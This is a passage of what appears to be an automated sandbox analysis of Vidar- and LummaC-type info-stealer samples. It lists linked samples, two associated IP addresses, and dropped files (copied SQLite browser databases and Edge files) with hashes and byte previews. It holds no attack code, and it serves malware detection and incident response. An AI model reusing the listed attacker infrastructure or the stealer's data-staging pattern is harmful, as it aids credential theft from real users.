                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205
                                                                                                                                                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                                                                    • 188.245.216.205

                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comyoda.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                      lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                                                                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                    LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                      eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\putt.exescript.ps1Get hashmaliciousVidarBrowse

                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                          C:\ProgramData\HD2VK6XT2VAI\1NG4W4EKN

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):51200
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\HD2VK6XT2VAI\37Q1NG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                          Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\HD2VK6XT2VAI\E3O8Y5

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2676416689747718
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:L/2qOB1nxCkMXSA1LyKOMq+8iP5GDHP/0jMVumw:Kq+n0JX91LyKOMq+8iP5GLP/01
                                                                                                                                                                                                                                                                          MD5:9C72978D62707A972C39A9C1314D4C4C
                                                                                                                                                                                                                                                                          SHA1:18C5BDD0D83CDBF89F1C83C5B0A02376E8F9CF36
                                                                                                                                                                                                                                                                          SHA-256:36AC5B2F92DFD04A55E7AB76FCB5FE6C1641B42861D62B45F88368A9ED6CC67E
                                                                                                                                                                                                                                                                          SHA-512:831EBEE8D45358AEBCFCBD72939116BA5509434E18C640DADF576CC7DEB9C26D2681D74BA42BBA2ABE446EDBC52BD1B670DE462078DA437DA788367CF433A179
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\HD2VK6XT2VAI\L68Y5X

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):159744
                                                                                                                                                                                                                                                                          Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\HD2VK6XT2VAI\OZUAIEKXT

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\HD2VK6XT2VAI\R9Z5X4

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):155648
                                                                                                                                                                                                                                                                          Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7263193180573361
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0U:9JZj5MiKNnNhoxuF
                                                                                                                                                                                                                                                                          MD5:F7E3ACBC0F94F1DFE6E88602200B117F
                                                                                                                                                                                                                                                                          SHA1:450365F994F4DFAA2E86530EFFEBAD8A20A701FC
                                                                                                                                                                                                                                                                          SHA-256:CEF9E22FF9074C467B7025DBAEF941419D5D4A7DDEDC626E7213D78752C28833
                                                                                                                                                                                                                                                                          SHA-512:5C18E4C1D0C08BC2049E34639622301ABAF4F84A825D8D860A4DDD70264A5E5D0FCFB00BFA07FCF24061FAEC87D6AE5E0BD4F71EAD3D60A6AA2F92B3FA63297B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x22d53864, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1310720
                                                                                                                                                                                                                                                                          Entropy (8bit):0.7556147603326068
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:dSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:dazaSvGJzYj2UlmOlOL
                                                                                                                                                                                                                                                                          MD5:C0FB32BE96BEF1C29E5B5EA3A966B472
                                                                                                                                                                                                                                                                          SHA1:09FACEBC0F433E99BFC64A635E116A9DF4B66AFF
                                                                                                                                                                                                                                                                          SHA-256:B2185EE4ABC40AB2AE02C5CA0BCC083AC99FDD15E8803414FE4A7DA438B2EF66
                                                                                                                                                                                                                                                                          SHA-512:25335FBD23C89677138EDC7DEB2551B6C269B663B1A2729B91447CF546D75FE1AC0BBB69BEBEADFE1CAB0CF26EF54D458EBB856C64A6909C337185194E9B0DEA
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:".8d... .......7.......X\...;...{......................0.e......!...{?.(....|%.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................Q~..(....|E.................Ug.V(....|E..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16384
                                                                                                                                                                                                                                                                          Entropy (8bit):0.07934271039077499
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:cf/lllKYe6Sj0jgGuNaAPaU1lvFtgj/ll/olluxmO+l/SNxOf:c3tKzjjaluNDPaU1Sj//AgmOH
                                                                                                                                                                                                                                                                          MD5:73AA5F8C40EB64AF92524A518C0C3AD2
                                                                                                                                                                                                                                                                          SHA1:C96D7245774422FE42945FD202445B7E15BBA01F
                                                                                                                                                                                                                                                                          SHA-256:5EB151B6DE877E64C04DDF8539437572F7B5B72B02F9A8259B05377A78C370C8
                                                                                                                                                                                                                                                                          SHA-512:417EE9ABE5BFEE778DC35CE86D6D2875535D1D5A60CA91C78B858841B6A29CD922381F2F55380EF501E6524E85431FC99440969D7656D8A238EC0BA664AF2F80
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...p.....................................;...{..(....|E..!...{?..........!...{?..!...{?..g...!...{?.................Ug.V(....|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2163cde1-63d6-4a93-a62c-7688d67f7910.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44894
                                                                                                                                                                                                                                                                          Entropy (8bit):6.095147494967383
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWJji1zNtiATNfsUrtE3PF5DKJDSgzMMd6qD47u3+CO:+/Ps+wsI7ynku4KtSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:D93804E0EF24300DB595C46CC2AE72EF
                                                                                                                                                                                                                                                                          SHA1:6A151B2108CA5A8F220BE9BC98EE0087BD634539
                                                                                                                                                                                                                                                                          SHA-256:914D6AFBCA213374B024480FF2E538DADE20E6ED1231A0C89CA2F7E6D4936944
                                                                                                                                                                                                                                                                          SHA-512:49E7CB7D78421093157802FF539D813E6D7B819BDDA6F6AB8A363C18E496D70F0C36110A5E6A8C98611D82CD20D05447CDF6D196444FDCC7C8185AC993A39E71
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\62a4a3a7-bfc1-4b37-92d4-f39780049d12.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44455
                                                                                                                                                                                                                                                                          Entropy (8bit):6.089825674951637
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWbdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5AkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                          MD5:CC806F2E23F09AA6023A2E5346F5B3B5
                                                                                                                                                                                                                                                                          SHA1:FF9F9E726EB80F676D3FE243EBFAC5DBD48E6789
                                                                                                                                                                                                                                                                          SHA-256:23A9578985A4B4D7049112177BD6B5F7174EE3B51268E6DED5CADAB3E1BDCF1D
                                                                                                                                                                                                                                                                          SHA-512:2A2BD2253545A7E815CCE2AD78E955B78532BDC0A7632864310D61E78BE6766ECF1FDD599D51AEFF124BBFA2603A63F6D3D95521BCD2CBFCC8CFCB84CA8B67EC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-676E44F8-1920.pma

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3293219877026245
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3072:doVu1bNGc60WJG4umVKwYzOchxEerXhn16q19BgJq:yu1o9umVzYzO076+BgJq
                                                                                                                                                                                                                                                                          MD5:EBEC828413F40DC136B2A5F7F18605FF
                                                                                                                                                                                                                                                                          SHA1:645694C3AEA9892728B347F0DCFDE2BA00BF42FF
                                                                                                                                                                                                                                                                          SHA-256:08FBBA1A51F9A7E0F3D359E9ABFA459723FFD323CE6DD644F23308909DEFD1E8
                                                                                                                                                                                                                                                                          SHA-512:964DFB44D9F5E233E3E1086FBBF0B52E1D318EB1124D4C7A37158BA0BF92E81B79C96CF7BFF3D2D2CA63C8A22C3AE750CF06105B5079AB71DE7DA7ED99736CED
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@...............pS..PS..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".vkjpwx20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2......

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                          Entropy (8bit):4.0984945491284295
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
                                                                                                                                                                                                                                                                          MD5:AFAC5E4CC1213807ACB7D1A0F61BCF99
                                                                                                                                                                                                                                                                          SHA1:FEDCA0A829A0DBCCD1E9D7048398372FF9604783
                                                                                                                                                                                                                                                                          SHA-256:FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
                                                                                                                                                                                                                                                                          SHA-512:44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\57f9409e-8b91-417a-a728-568e37dd31bf.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
